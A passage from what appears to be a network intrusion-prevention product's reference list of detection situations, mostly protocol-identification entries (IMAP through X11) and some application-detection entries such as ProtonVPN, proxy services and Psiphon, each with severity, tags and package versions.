Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-459-5211
Description:
Back to top

ProtoId_IMAP-Client

About this situation: IMAP protocol context
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-461-5211
Description:
Back to top

ProtoId_IMAP-Client-Stop

About this situation: IMAP Client stop condition
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-459-5211
Description:
Back to top

ProtoId_IMAP-Server

About this situation: IMAP protocol context
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-461-5211
Description:
Back to top

ProtoId_ISAKMP

About this situation: ISAKMP protocol detected
Context: ProtoId UDP Client Message
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1280-5242
Last changed: sgpkg-ips-1280-5242
Description:
Back to top

ProtoId_JSON-RPC-Client

About this situation: JSON-RPC protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1104-5242
Last changed: sgpkg-ips-1104-5242
Description:
Back to top

ProtoId_JSON-RPC-Server

About this situation: JSON-RPC protocol detected
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1104-5242
Last changed: sgpkg-ips-1104-5242
Description:
Back to top

ProtoId_Kpasswd-Client

About this situation: Kpasswd protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1155-5242
Last changed: sgpkg-ips-1155-5242
Description:
Back to top

ProtoId_Kpasswd-Server

About this situation: Kpasswd protocol detected
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1155-5242
Last changed: sgpkg-ips-1155-5242
Description:
Back to top

ProtoId_LDAP-Client

About this situation: LDAP protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-602-5211
Description:
Back to top

ProtoId_LDAP-Server

About this situation: LDAP protocol detected
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-602-5211
Description:
Back to top

ProtoId_LLMNR

About this situation: LLMNR protocol detected
Context: ProtoId UDP Client Message
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1150-5242
Description:
Back to top

ProtoId_LLMNR-TCP-Client

About this situation: LLMNR protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1150-5242
Description:
Back to top

ProtoId_LLMNR-TCP-Server

About this situation: LLMNR protocol detected
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1150-5242
Description:
Back to top

ProtoId_mDNS

About this situation: mDNS protocol detected
Context: ProtoId UDP Client Message
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1153-5242
Last changed: sgpkg-ips-1153-5242
Description:
Back to top

ProtoId_MOUNT-Client

About this situation: MOUNT protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1409-5242
Last changed: sgpkg-ips-1409-5242
Description:
Back to top

ProtoId_MOUNT-UDP

About this situation: MOUNT UDP protocol context
Context: ProtoId UDP Client Message
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1409-5242
Last changed: sgpkg-ips-1409-5242
Description:
Back to top

ProtoId_MQTT-Client

About this situation: MQTT protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1326-5242
Last changed: sgpkg-ips-1326-5242
Description:
Back to top

ProtoId_MQTT-Server

About this situation: MQTT protocol detected
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1326-5242
Last changed: sgpkg-ips-1326-5242
Description:
Back to top

ProtoId_MSRPC-Client

About this situation: MSRPC protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-459-5211
Description:
Back to top

ProtoId_MSRPC-Server

About this situation: MSRPC protocol detected
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-459-5211
Description:
Back to top

ProtoId_MSSQL-Client

About this situation: MSSQL protocol context
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-461-5211
Description:
Back to top

ProtoId_MSSQL-Server

About this situation: MSSQL protocol context
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-461-5211
Description:
Back to top

ProtoId_MSSQL-UDP

About this situation: MSSQL UDP protocol context
Context: ProtoId UDP Client Message
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1030-5242
Last changed: sgpkg-ips-1030-5242
Description:
Back to top

ProtoId_MySQL-Client

About this situation: MySQL protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

ProtoId_MySQL-Server

About this situation: MySQL protocol detected
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

ProtoId_NAT-T

About this situation: NAT-T protocol detected
Context: ProtoId UDP Client Message
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1280-5242
Last changed: sgpkg-ips-1280-5242
Description:
Back to top

ProtoId_NBDS

About this situation: NBDS protocol detected
Context: ProtoId UDP Client Message
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1156-5242
Last changed: sgpkg-ips-1156-5242
Description:
Back to top

ProtoId_NBNS

About this situation: NBNS protocol detected
Context: ProtoId UDP Client Message
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1150-5242
Description:
Back to top

ProtoId_NBNS-TCP-Client

About this situation: NBNS protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1155-5242
Last changed: sgpkg-ips-1155-5242
Description:
Back to top

ProtoId_NBNS-TCP-Server

About this situation: NBNS protocol detected
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1155-5242
Last changed: sgpkg-ips-1155-5242
Description:
Back to top

ProtoId_NFS-Client

About this situation: NFS protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1409-5242
Last changed: sgpkg-ips-1409-5242
Description:
Back to top

ProtoId_NFS-UDP

About this situation: NFS UDP protocol context
Context: ProtoId UDP Client Message
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1409-5242
Last changed: sgpkg-ips-1409-5242
Description:
Back to top

ProtoId_NFS3-Client

About this situation: NFSv3 protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1409-5242
Last changed: sgpkg-ips-1409-5242
Description:
Back to top

ProtoId_NFS4-Client

About this situation: NFSv4 protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1409-5242
Last changed: sgpkg-ips-1409-5242
Description:
Back to top

ProtoId_NNTP-Client

About this situation: NNTP protocol context
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-461-5211
Description:
Back to top

ProtoId_NNTP-Server

About this situation: NNTP protocol context
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-461-5211
Description:
Back to top

ProtoId_OPC-UA-TCP-Client

About this situation: OPC UA TCP protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-604-5211
Last changed: sgpkg-ips-604-5211
Description:
Back to top

ProtoId_OPC-UA-TCP-Server

About this situation: OPC UA TCP protocol detected
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-604-5211
Last changed: sgpkg-ips-604-5211
Description:
Back to top

ProtoId_Oracle-Client

About this situation: Oracle TNS protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-456-5211
Last changed: sgpkg-ips-456-5211
Description:
Back to top

ProtoId_Oracle-Server

About this situation: Oracle TNS protocol detected
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-456-5211
Last changed: sgpkg-ips-456-5211
Description:
Back to top

ProtoId_POP3-Client

About this situation: IMAP protocol context
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-461-5211
Description:
Back to top

ProtoId_POP3-Server

About this situation: IMAP protocol context
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-461-5211
Description:
Back to top

ProtoId_Portmap-Client

About this situation: Portmap protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1409-5242
Last changed: sgpkg-ips-1409-5242
Description:
Back to top

ProtoId_Portmap-UDP

About this situation: Portmap UDP protocol context
Context: ProtoId UDP Client Message
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1409-5242
Last changed: sgpkg-ips-1409-5242
Description:
Back to top

ProtoId_PPTP-Client

About this situation: PPTP protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-536-5211
Last changed: sgpkg-ips-536-5211
Description:
Back to top

ProtoId_PPTP-Server

About this situation: PPTP protocol detected
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-536-5211
Last changed: sgpkg-ips-536-5211
Description:
Back to top

ProtoId_QUIC

About this situation: QUIC protocol context
Context: ProtoId UDP Client Message
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1096-5242
Last changed: sgpkg-ips-1096-5242
Description:
Back to top

ProtoId_QUIC-Not-Supported

About this situation: QUIC protocol context
Context: ProtoId UDP Client Message
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1535-5242
Description:
Back to top

ProtoId_RDP-Client

About this situation: RDP protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1032-5242
Last changed: sgpkg-ips-1032-5242
Description:
Back to top

ProtoId_RDP-Client-UDP

About this situation: RDP protocol detected
Context: ProtoId UDP Client Message
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1155-5242
Last changed: sgpkg-ips-1155-5242
Description:
Back to top

ProtoId_RDP-Server

About this situation: RDP protocol detected
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1032-5242
Last changed: sgpkg-ips-1032-5242
Description:
Back to top

ProtoId_RFB-Client

About this situation: Remote Frambuffer protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-461-5211
Description:
Back to top

ProtoId_RFB-Server

About this situation: Remote Framebuffer protocol detected
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-461-5211
Description:
Back to top

ProtoId_RTP-Dynamic

About this situation: RTP protocol detected
Context: ProtoId UDP Client Message
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1744-5242
Last changed: sgpkg-ips-1744-5242
Description:
Back to top

ProtoId_RTSP-Client

About this situation: RTSP protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1362-5242
Last changed: sgpkg-ips-1362-5242
Description:
Back to top

ProtoId_RTSP-Server

About this situation: RTSP protocol detected
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1362-5242
Last changed: sgpkg-ips-1362-5242
Description:
Back to top

ProtoId_Server-Not-FTP

About this situation: Server side protocol is not FTP.
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1139-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

ProtoId_Server-Not-SMTP

About this situation: Server side protocol is not SMTP.
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1139-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

ProtoId_SIP-Client

About this situation: SIP protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-522-5211
Description:
Back to top

ProtoId_SIP-Server

About this situation: SIP protocol detected
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

ProtoId_SIP-UDP

About this situation: SIP protocol detected
Context: ProtoId UDP Client Message
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

ProtoId_SMB-Client

About this situation: SMB protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-461-5211
Description:
Back to top

ProtoId_SMB-Server

About this situation: SMB protocol detected
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-461-5211
Description:
Back to top

ProtoId_SMB2-Client

About this situation: SMB2 protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1139-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

ProtoId_SMB2-Server

About this situation: SMB2 protocol detected
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-461-5211
Description:
Back to top

ProtoId_SMB_Client-Stop

About this situation: Protocol identification completed for SMB client
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-525-5211
Last changed: sgpkg-ips-525-5211
Description:
Back to top

ProtoId_SMTP-Client

About this situation: SMTP protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

ProtoId_SMTP-Server

About this situation: SMTP protocol detected
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

ProtoId_SNMP-Client

About this situation: SNMP protocol context
Context: ProtoId UDP Client Message
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-461-5211
Description:
Back to top

ProtoId_SSH-Client

About this situation: SSH protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-461-5211
Description:
Back to top

ProtoId_SSH-Server

About this situation: SSH protocol detected
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-461-5211
Description:
Back to top

ProtoId_SSH_Server-Stop

About this situation: Protocol identification completed for SSH server
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-520-5211
Description:
Back to top

ProtoId_STUN

About this situation: STUN protocol
Context: ProtoId UDP Client Message
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1145-5242
Last changed: sgpkg-ips-1145-5242
Description:
Back to top

ProtoId_SVN-Client

About this situation: SVN protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

ProtoId_SVN-Server

About this situation: SVN protocol detected
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-657-5211
Description:
Back to top

ProtoId_TCP-Buffering-Limit-Exceeded

About this situation: Buffering limit exceeded while trying to identify the protocol in a TCP connection
Context: ProtoId without parameters
Severity: 1
Tags: Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-461-5211
Description: The protocol in a TCP connection was not identified before the maximum amount of buffered data was received. The buffering is stopped. If the protocol is identfied later, the connection is inspected using the correct inspection contexts from that point on, skipping the data in the connection beginning.
Back to top

ProtoId_TCP-Client-Identification-Finished

About this situation: Protocol identification finished for TCP client
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1139-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

ProtoId_TCP-Client-Identification-Started

About this situation: Protocol identification initiated for TCP client
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1139-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

ProtoId_TCP-Client-Stop

About this situation: Protocol identification completed for TCP client
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-459-5211
Description:
Back to top

ProtoId_TCP_Client-Data-Not-Seen

About this situation: ProtoId TCP client stream has not seen any data.
Context: ProtoId without parameters
Severity: 1
Tags: Content Identification
First detected in: sgpkg-ips-1109-5242
Last changed: sgpkg-ips-1109-5242
Description: ProtoId TCP client stream has not seen any data.
Back to top

ProtoId_TCP_Client-Data-Seen

About this situation: Data has been seen in the TCP Client protocol identification stream.
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1547-5242
Last changed: sgpkg-ips-1547-5242
Description:
Back to top

ProtoId_TCP_Data-Seen

About this situation: Some data seen in TCP stream
Context: ProtoId without parameters
Severity: 1
Tags: Content Identification
First detected in: sgpkg-ips-1098-5242
Last changed: sgpkg-ips-1098-5242
Description: Some data has been seen in a TCP stream.
Back to top

ProtoId_TCP_Server-Data-Not-Seen

About this situation: ProtoId TCP server stream has not seen any data.
Context: ProtoId without parameters
Severity: 1
Tags: Content Identification
First detected in: sgpkg-ips-1109-5242
Last changed: sgpkg-ips-1109-5242
Description: ProtoId TCP server stream has not seen any data.
Back to top

ProtoId_TCP_Server-Data-Seen

About this situation: Data has been seen in the TCP Server protocol identification stream.
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1547-5242
Last changed: sgpkg-ips-1547-5242
Description:
Back to top

ProtoId_TCP_Server-Identification-Finished

About this situation: Protocol identification finished for TCP server
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1139-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

ProtoId_TCP_Server-Identification-Started

About this situation: Protocol identification initiated for TCP server
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1139-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

ProtoId_TCP_Server-Stop

About this situation: Protocol identification completed for TCP server
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-459-5211
Description:
Back to top

ProtoId_Telnet-Client

About this situation: Telnet protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

ProtoId_Telnet-Client-Stop

About this situation: Telnet protocol detection stopped
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1100-5242
Last changed: sgpkg-ips-1100-5242
Description:
Back to top

ProtoId_Telnet-Server

About this situation: Telnet protocol detected
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

ProtoId_Telnet-Server-Stop

About this situation: Telnet Server stop condition
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-459-5211
Description:
Back to top

ProtoId_TFTP-Client

About this situation: TFTP protocol context
Context: ProtoId UDP Client Message
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-461-5211
Description:
Back to top

ProtoId_TFTP_Client-Stop

About this situation: Protocol identification completed for TFTP client
Context: ProtoId UDP Client Message
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-459-5211
Description:
Back to top

ProtoId_UDP_Client-Stop

About this situation: Protocol identification completed for UDP client
Context: ProtoId UDP Client Message
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-459-5211
Description:
Back to top

ProtoId_UPnP-Stop

About this situation: Protocol identification completed for uPnP
Context: ProtoId UDP Client Message
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Description:
Back to top

ProtoId_X11-Client

About this situation: X11 protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

ProtoId_X11-Server

About this situation: X11 protocol detected
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

ProtoId_Zero-Client

About this situation: Zero protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1042-5242
Last changed: sgpkg-ips-1042-5242
Description:
Back to top

ProtonMail

About this situation: Application ProtonMail detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ProtonMail is a service that provides secure email around the principle of zero access.
Back to top

ProtonVPN

About this situation: Endpoint Context Agent based ProtonVPN Connection
Context: EI Correlation
Severity: 1
Tags: Tunneling, Endpoint
First detected in: sgpkg-ips-1189-5242
Last changed: sgpkg-ips-1189-5242
Description: ProtonVPN endpoint application has been detected. ProtonVPN is a proxy-based tool for internet privacy and security that allows users to bypass firewalls and protect their identity online.
Back to top

ProtonVPN

About this situation: ProtonVPN usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-1189-5242
Last changed: sgpkg-ips-1772-5242
Description: ProtonVPN is a VPN tool.
Back to top

Protoshare

About this situation: Application Protoshare detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ProtoShare is a collaborative software tool used for creating, reviewing, and refining website, mobile and web application prototypes. It enables individuals and companies to visualize project requirements by building website wireframes and application prototypes that team members and stakeholders can then review and comment on in real-time.
Back to top

Provade

About this situation: Application Provade detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Provade provides an enterprise vendor management system for workforce management and procurement. The company offers identity management, implementation, training, support, and managed services.
Back to top

Proworkflow

About this situation: ProWorkflow usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1764-5242
Description: ProWorkflow is a project management software to optimize customers business processes, manage staff resources, track projects, tasks and time globally.
Back to top

Proxify

About this situation: Proxify usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1128-5242
Description: Proxify is an SSL proxy that can be used to surf the Internet anonymously and to circumvent access limitations.
Back to top

Proxy Avoidance

About this situation: Sites that provide information about how to bypass proxy server features or to gain access to URLs in any way that bypasses the proxy server.
Context: URL Application Context
Severity: 1
Tags: Information Technology, Security Risk, Legal Liability
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about how to bypass proxy server features or to gain access to URLs in any way that bypasses the proxy server.
Back to top

Proxy.org

About this situation: Proxy.org usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A service that provides anonymizing and proxy services
Back to top

Proxyclick

About this situation: Application Proxyclick detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Proxyclick produces cloud based software that simplify office life for employees. Specialize in processes typically managed by the Facility Manager and
Back to top

ProxyLocal

About this situation: ProxyLocal usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-1128-5242
Description: ProxyLocal is a tunnelling application written in Ruby. The application uses a client-server architecture where the client is installed on the user machine and the server runs on proxylocal.com.
Back to top

Proxyway

About this situation: proxyway usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-636-5211
Description: An anonymizing proxy service
Back to top

Prudential

About this situation: Application Prudential detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Prudential plc is a British multinational life insurance and financial services company.
Back to top

PRWeb

About this situation: Application PRWeb detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PRWeb is an online news distribution and online publicity. PRWeb democratized news distribution, transforming the press release from an expensive tool used by large corporations to an inexpensive yet highly effective way for organizations of all sizes to distribute their news on the Internet, increase their visibility online and attract customers.
Back to top

PSclicks

About this situation: Application PSclicks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PSclicks - Advertising Network serving the Public Safety, Law Enforcement, Firefighter, Paramedic, EMS, Military and Outdoors verticals.
Back to top

PSCP

About this situation: Endpoint Context Agent based PSCP
Context: EI Correlation
Severity: 1
Tags: File Transfer, Endpoint
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: PSCP endpoint application has been detected.
Back to top

PSD2HTML

About this situation: Application PSD2HTML detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PSD2HTML provides a full range of services across the website development cycle, from HTML
Back to top

PSFTP

About this situation: Endpoint Context Agent based PSFTP
Context: EI Correlation
Severity: 1
Tags: File Transfer, Endpoint
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: PSFTP endpoint application has been detected.
Back to top

Psiphon

About this situation: Endpoint Context Agent based Psiphon Connection
Context: EI Correlation
Severity: 1
Tags: Tunneling, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Psiphon endpoint application has been detected. Psiphon is an internet proxy connection service.
Back to top

Psiphon

About this situation: Psiphon usage detected
Context: Application Context
